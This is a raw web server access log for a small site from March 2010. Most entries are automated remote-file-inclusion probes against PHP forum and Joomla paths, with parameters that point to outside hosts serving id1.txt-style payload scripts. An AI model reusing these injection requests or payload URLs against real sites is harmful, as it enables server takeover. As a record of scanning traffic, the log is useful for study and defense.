67.195.112.187 - - [06/Mar/2010:13:26:05 -0800] "GET /logs/access_100227.log HTTP/1.0" 200 4361208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:13:28:48 -0800] "GET /logs/access.log/gnuboard4//bbs/write_comment_update.php/?board_skin_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
64.6.109.50 - - [06/Mar/2010:13:33:02 -0800] "GET /logs/access.log%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://thisrapgame.com/wp-content/themes/ThisRapGame/phpThumb/cache/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
64.6.109.50 - - [06/Mar/2010:13:33:02 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://thisrapgame.com/wp-content/themes/ThisRapGame/phpThumb/cache/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
64.6.109.50 - - [06/Mar/2010:13:33:02 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://thisrapgame.com/wp-content/themes/ThisRapGame/phpThumb/cache/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.getyourselfahorse.com"
67.205.50.6 - - [06/Mar/2010:13:46:48 -0800] "GET /logs/access.log/?sourcedir=http://fluffylabs.com/i1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.205.50.6 - - [06/Mar/2010:13:46:48 -0800] "GET /logs/?sourcedir=http://fluffylabs.com/i1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.205.50.6 - - [06/Mar/2010:13:46:48 -0800] "GET /?sourcedir=http://fluffylabs.com/i1.txt?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:49:09 -0800] "GET /logs/access_100220.log/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:49:09 -0800] "GET /?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:49:09 -0800] "GET /logs/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:49:13 -0800] "GET /logs/access_100220.log/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:49:13 -0800] "GET /?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:49:13 -0800] "GET /logs/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:49:58 -0800] "GET /logs/access.log/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:50:03 -0800] "GET /logs/access.log/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:51:55 -0800] "GET /logs/access.log%20%20/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:51:55 -0800] "GET /logs/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:51:55 -0800] "GET /?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:52:00 -0800] "GET /logs/access_100220.log%20%20/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:52:08 -0800] "GET /?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:13:52:13 -0800] "GET /logs/access_100220.log%20%20/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:14:07:53 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:14:08:29 -0800] "GET /logs/access_100220.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
200.93.147.154 - - [06/Mar/2010:14:08:32 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=https://www.bostonkorea.org///BackUp/board/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:14:17:14 -0800] "GET /modules/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=?GALLERY_BASEDIR=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:14:17:14 -0800] "GET /logs/access_100227.log%20%20//modules/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=?GALLERY_BASEDIR=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:14:17:14 -0800] "GET /logs//modules/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=?GALLERY_BASEDIR=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:14:19:46 -0800] "GET /logs//modules/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=?GALLERY_BASEDIR=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:14:19:46 -0800] "GET /logs/access.log//modules/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=?GALLERY_BASEDIR=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:14:19:46 -0800] "GET /modules/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=?GALLERY_BASEDIR=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:14:20:51 -0800] "GET /logs/access_100227.log//modules/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=?GALLERY_BASEDIR=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:14:25:18 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:14:25:18 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:14:25:18 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:14:35:06 -0800] "GET /logs/access.log%20%20/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:14:35:06 -0800] "GET /logs/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:14:35:06 -0800] "GET /?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:14:35:48 -0800] "GET /logs/access.log%20%20/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:14:35:49 -0800] "GET /logs/?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.191.94.188 - - [06/Mar/2010:14:35:49 -0800] "GET /?board_skin_path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.205.50.6 - - [06/Mar/2010:14:38:10 -0800] "GET /logs/access.log/?sourcedir=http://fluffylabs.com/i1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.205.50.6 - - [06/Mar/2010:14:38:10 -0800] "GET /?sourcedir=http://fluffylabs.com/i1.txt?? HTTP/1.1" 200 915 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
67.205.50.6 - - [06/Mar/2010:14:38:10 -0800] "GET /logs/?sourcedir=http://fluffylabs.com/i1.txt?? HTTP/1.1" 200 1081 "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:14:41:33 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:14:41:33 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:14:41:33 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:14:42:09 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:14:42:09 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
194.63.235.157 - - [06/Mar/2010:14:42:09 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:09:19 -0800] "GET /bbs///delete_all.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:09:19 -0800] "GET /logs/access.log%20%20//bbs///delete_all.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:09:20 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:11:47 -0800] "GET /logs/access_100220.log%20%20//bbs///delete_all.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:12:11 -0800] "GET /logs/access.log%20%20//bbs///delete_all.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:12:11 -0800] "GET /bbs///delete_all.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:12:11 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:14:32 -0800] "GET /logs/access_100220.log%20%20//bbs///delete_all.php?board_skin_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
123.143.29.250 - - [06/Mar/2010:15:18:32 -0800] "GET /logs/access_100220.log///bbs//write_update.php?board_skin_path=http://www.lovebyday.com/components/idv6.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
123.143.29.250 - - [06/Mar/2010:15:18:32 -0800] "GET //bbs//write_update.php?board_skin_path=http://www.lovebyday.com/components/idv6.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
123.143.29.250 - - [06/Mar/2010:15:18:32 -0800] "GET /logs///bbs//write_update.php?board_skin_path=http://www.lovebyday.com/components/idv6.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:28:24 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:28:24 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:28:24 -0800] "GET /logs/access_100220.log%20%20//bbs//delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:28:26 -0800] "GET /logs/access_100220.log%20%20//bbs//delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:28:26 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:28:26 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:29:19 -0800] "GET /logs/access.log%20%20//bbs//delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:29:19 -0800] "GET /logs/access.log%20%20//bbs//delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
77.88.25.28 - - [06/Mar/2010:15:29:42 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:15:30:25 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:15:30:25 -0800] "GET /logs/access_100227.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:15:30:25 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:15:30:45 -0800] "GET /logs/access_100227.log%20%20//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:33:13 -0800] "GET /ggambo7002_board/write.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:33:13 -0800] "GET /logs//ggambo7002_board/write.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:33:13 -0800] "GET /logs/access.log%20%20//ggambo7002_board/write.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:38:40 -0800] "GET /logs//ggambo7002_board/write.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:38:40 -0800] "GET /logs/access.log%20%20//ggambo7002_board/write.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:15:38:40 -0800] "GET /ggambo7002_board/write.php?dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
199.120.90.223 - - [06/Mar/2010:15:39:31 -0800] "GET /logs/scripts.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:39:40 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:39:40 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:39:40 -0800] "GET /write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:39:45 -0800] "GET /logs/access_100220.log%20%20//write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
208.80.193.28 - - [06/Mar/2010:15:42:54 -0800] "GET / HTTP/1.0" 200 899 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyWebbrowser 1,13 Embedded Web Browser from: http://bsalsa.com/)" "getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:42:54 -0800] "GET /write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:42:54 -0800] "GET /logs//write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:42:54 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:42:55 -0800] "GET /logs/access_100220.log%20%20//write_update.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:44:00 -0800] "GET //yuboard/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:44:00 -0800] "GET /logs///yuboard/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:44:00 -0800] "GET /logs/access_100220.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:44:21 -0800] "GET //yuboard/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:44:25 -0800] "GET /logs///yuboard/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:44:25 -0800] "GET /logs/access_100220.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:44:56 -0800] "GET /logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
81.93.240.199 - - [06/Mar/2010:15:45:14 -0800] "GET /logs/access.log%20%20///yuboard/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
122.160.99.22 - - [06/Mar/2010:15:50:24 -0800] "GET / HTTP/1.1" 200 915 "-" "-" "getyourselfahorse.com"
221.141.1.113 - - [06/Mar/2010:15:57:11 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
221.141.1.113 - - [06/Mar/2010:15:57:11 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
221.141.1.113 - - [06/Mar/2010:15:57:21 -0800] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
189.108.236.148 - - [06/Mar/2010:16:10:32 -0800] "GET /logs/scripts.log/index.php3?p=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
189.108.236.148 - - [06/Mar/2010:16:10:32 -0800] "GET /logs/index.php3?p=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
189.108.236.148 - - [06/Mar/2010:16:10:32 -0800] "GET /index.php3?p=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:16:11:52 -0800] "GET /logs/scripts.log/index.php4?lang=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:16:11:52 -0800] "GET /logs/index.php4?lang=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
173.212.202.130 - - [06/Mar/2010:16:11:52 -0800] "GET /index.php4?lang=http://seng-k.uni.cc/pitch/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
189.108.236.148 - - [06/Mar/2010:16:12:38 -0800] "GET /logs/scripts.log%20%20/index.php3?p=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
221.141.1.113 - - [06/Mar/2010:16:13:42 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:16:21:15 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:16:21:15 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:16:21:15 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:16:21:19 -0800] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
58.150.99.144 - - [06/Mar/2010:16:21:19 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
